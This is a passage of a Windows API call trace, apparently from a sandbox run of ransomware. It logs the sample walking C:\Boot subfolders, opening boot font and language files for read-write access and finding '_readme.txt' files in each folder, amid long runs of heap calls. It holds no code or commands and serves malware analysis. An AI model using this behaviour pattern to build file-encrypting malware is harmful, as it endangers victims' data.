"c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.759] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.759] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0146.759] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.760] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.760] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned=".txt" [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.760] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb1f9f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.760] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.760] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.760] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.760] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.760] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.761] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.761] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.762] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.762] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.763] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.763] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.763] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.763] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0146.763] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.763] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.763] PathFindFileNameW (pszPath="") returned="" [0146.763] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.763] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.763] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.763] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.763] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.763] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0146.764] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.764] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.764] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.764] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.764] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0146.764] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.764] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.764] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned=".txt" [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.764] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.764] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.764] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.764] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.764] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.764] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.765] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.765] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.766] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.766] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.766] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.766] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.766] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.766] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.766] PathFindFileNameW (pszPath="") returned="" [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.766] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.766] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.766] RtlAllocateHeap 